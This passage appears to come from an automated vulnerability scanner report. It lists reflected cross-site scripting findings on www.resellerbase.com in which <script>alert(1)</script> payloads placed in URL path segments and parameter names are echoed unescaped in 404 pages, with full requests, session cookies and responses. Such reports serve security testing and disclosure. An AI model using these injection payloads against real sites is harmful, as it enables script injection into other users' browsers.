Path:   /detail/11/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d9626<script>alert(1)</script>b4996eec938 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes/kosmosd9626<script>alert(1)</script>b4996eec938/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmosd9626<script>alert(1)</script>b4996eec938/images/rating/ was not found on this server.</p>
...[SNIP]...

2.949. http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 1260c<script>alert(1)</script>1fee3340fc9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes/kosmos/images1260c<script>alert(1)</script>1fee3340fc9/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmos/images1260c<script>alert(1)</script>1fee3340fc9/rating/ was not found on this server.</p>
...[SNIP]...

2.950. http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/ [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 2f808<script>alert(1)</script>5d78d409777 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes/kosmos/images/rating2f808<script>alert(1)</script>5d78d409777/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmos/images/rating2f808<script>alert(1)</script>5d78d409777/ was not found on this server.</p>
...[SNIP]...

2.951. http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9353c<script>alert(1)</script>cc1bcd9b4d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes/kosmos/images/rating/?9353c<script>alert(1)</script>cc1bcd9b4d1=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmos/images/rating/?9353c<script>alert(1)</script>cc1bcd9b4d1=1 was not found on this server.</p>
...[SNIP]...

2.952. http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/4half.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2075f<script>alert(1)</script>eb0d4933725 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail2075f<script>alert(1)</script>eb0d4933725/11/themes/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail2075f<script>alert(1)</script>eb0d4933725/11/themes/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.953. http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/4half.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 57bf0<script>alert(1)</script>d2a2b519ee2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/1157bf0<script>alert(1)</script>d2a2b519ee2/themes/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/1157bf0<script>alert(1)</script>d2a2b519ee2/themes/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.954. http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/4half.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8f32a<script>alert(1)</script>4c12f45bb32 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes8f32a<script>alert(1)</script>4c12f45bb32/kosmos/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes8f32a<script>alert(1)</script>4c12f45bb32/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.955. http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/4half.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 433d6<script>alert(1)</script>e555a7a902d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes/kosmos433d6<script>alert(1)</script>e555a7a902d/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmos433d6<script>alert(1)</script>e555a7a902d/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.956. http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/4half.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload bfdd7<script>alert(1)</script>ef6de56d1e9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes/kosmos/imagesbfdd7<script>alert(1)</script>ef6de56d1e9/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmos/imagesbfdd7<script>alert(1)</script>ef6de56d1e9/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.957. http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/4half.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload c865d<script>alert(1)</script>ce381fb61ea was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes/kosmos/images/ratingc865d<script>alert(1)</script>ce381fb61ea/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmos/images/ratingc865d<script>alert(1)</script>ce381fb61ea/4half.gif was not found on this server.</p>
...[SNIP]...

2.958. http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/4half.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 2a017<script>alert(1)</script>ed6509640fa was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes/kosmos/images/rating/4half.gif2a017<script>alert(1)</script>ed6509640fa HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmos/images/rating/4half.gif2a017<script>alert(1)</script>ed6509640fa was not found on this server.</p>
...[SNIP]...

2.959. http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/4half.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/kosmos/images/rating/4half.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload fce78<script>alert(1)</script>4678ef8ebb6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes/kosmos/images/rating/4half.gif?fce78<script>alert(1)</script>4678ef8ebb6=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmos/images/rating/4half.gif?fce78<script>alert(1)</script>4678ef8ebb6=1 was not found on this server.</p>
...[SNIP]...

2.960. http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 25179<script>alert(1)</script>3319997e524 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail25179<script>alert(1)</script>3319997e524/11/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail25179<script>alert(1)</script>3319997e524/11/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.961. http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 79856<script>alert(1)</script>ec7d0044beb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/1179856<script>alert(1)</script>ec7d0044beb/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/1179856<script>alert(1)</script>ec7d0044beb/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.962. http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 75f45<script>alert(1)</script>12358be191a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes75f45<script>alert(1)</script>12358be191a/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes75f45<script>alert(1)</script>12358be191a/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.963. http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2f624<script>alert(1)</script>fdbd2b6172f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes/kosmos2f624<script>alert(1)</script>fdbd2b6172f/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmos2f624<script>alert(1)</script>fdbd2b6172f/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.964. http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 3f9d4<script>alert(1)</script>7db9e7062b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes/kosmos/images3f9d4<script>alert(1)</script>7db9e7062b/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmos/images3f9d4<script>alert(1)</script>7db9e7062b/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.965. http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload d696c<script>alert(1)</script>8324f886ad5 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes/kosmos/images/ratingd696c<script>alert(1)</script>8324f886ad5/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/11/themes/kosmos/images/ratingd696c<script>alert(1)</script>8324f886ad5/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.966. http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/search.php [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/11/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 99543<script>alert(1)</script>b43d08c3919 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/11/themes/kosmos/images/rating/search.php99543<script>alert(1)</script>b43d08c3919?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
